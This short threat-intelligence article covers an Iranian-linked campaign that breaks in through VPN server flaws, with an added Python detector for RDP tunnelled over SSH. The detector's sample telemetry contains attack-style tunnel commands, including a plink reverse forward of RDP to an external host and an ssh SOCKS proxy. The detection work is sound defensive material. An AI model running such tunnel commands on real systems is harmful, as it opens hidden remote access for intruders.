Iranian-origin Malware Campaign Exploiting Vulnerable VPN Servers

The Iranian-origin Fox Kitten malware campaign targets the government, IT, telecommunications, oil and gas, aviation, and security sectors around the world. The campaign breaks into networks by exploiting vulnerabilities in VPN products. By exploiting these VPN servers, the attackers gain remote access to the internal systems and networks of numerous companies.

The infamous Iranian offensive group APT34-OilRig is believed to be behind this attack. Researchers also believe that this campaign has connections with the APT33-Elfin and APT39-Chafer groups.

Vulnerabilities in VPN products such as Pulse Secure VPN, Fortinet VPN, and Palo Alto GlobalProtect are used to breach the targeted companies' networks. Once a network is compromised, a variety of communication tools, including opening RDP connections over SSH tunnels, are used to encrypt the attackers' traffic and retain access to the infected network.
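RDP carried over an SSH tunnel, as described above, leaves two observable traces on the compromised host: an SSH client launched with a port-forwarding switch that names port 3389, and an RDP connection whose source address is the loopback interface rather than a user's workstation. The following detection logic is an added example for this article, not code from the original report; it runs over a constructed batch of endpoint telemetry records (a hypothetical format) and also flags dynamic (SOCKS) forwards, which tunnel any protocol.

```python
import re

# Constructed sample telemetry (hypothetical schema): process launches and
# network connections as an EDR might export them for two hosts.
SAMPLE_EVENTS = [
    {"type": "process", "host": "fs01", "image": "plink.exe",
     "cmdline": "plink.exe -N -R 3389:127.0.0.1:3389 user@203.0.113.10 -P 443"},
    {"type": "process", "host": "fs01", "image": "ssh",
     "cmdline": "ssh -D 1080 -f -N user@203.0.113.10"},
    {"type": "process", "host": "fs02", "image": "ssh",
     "cmdline": "ssh admin@10.0.0.5"},
    {"type": "netconn", "host": "fs01", "src_ip": "127.0.0.1", "dst_port": 3389},
    {"type": "netconn", "host": "fs02", "src_ip": "10.0.0.23", "dst_port": 3389},
]

# OpenSSH and plink port-forwarding switches: -L (local), -R (remote),
# -D (dynamic SOCKS proxy). The switch may be followed by whitespace or not.
FORWARD_FLAG = re.compile(r"\s-(L|R|D)\s*(\S+)")
RDP_PORT = 3389


def tunnelled_rdp_indicators(events):
    """Return (host, reason) findings that suggest RDP over an SSH tunnel."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            for flag, spec in FORWARD_FLAG.findall(ev["cmdline"]):
                if flag == "D":
                    # A SOCKS forward can carry RDP (or anything else) without
                    # naming the port, so it is reported on its own.
                    findings.append((ev["host"], f"dynamic SSH forward (SOCKS) in {ev['image']}"))
                elif str(RDP_PORT) in spec.split(":"):
                    # -L/-R specs look like [bind:]port:host:port; 3389 in any
                    # position means RDP is one end of the tunnel.
                    findings.append((ev["host"], f"SSH -{flag} forward touching port {RDP_PORT}"))
        elif ev["type"] == "netconn":
            # RDP arriving from loopback means the client is a local tunnel
            # endpoint, not a remote user's workstation.
            if ev["dst_port"] == RDP_PORT and ev["src_ip"].startswith("127."):
                findings.append((ev["host"], "RDP connection sourced from loopback"))
    return findings


if __name__ == "__main__":
    for host, reason in tunnelled_rdp_indicators(SAMPLE_EVENTS):
        print(f"{host}: {reason}")
```

In a real deployment the same checks would be fed from process-creation and network-connection events (for example Sysmon event IDs 1 and 3) and tuned against legitimate administrative SSH usage.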

The purpose of these tools in the attack is to open a channel for RDP connections and information theft, to secure a foothold, and to escalate privileges.

Once the hackers have secured access to the targeted computer, they use an exfiltration channel to move files from the compromised computer to their own machines. Penetrating the network is only the first step towards establishing a permanent foothold through backdoors.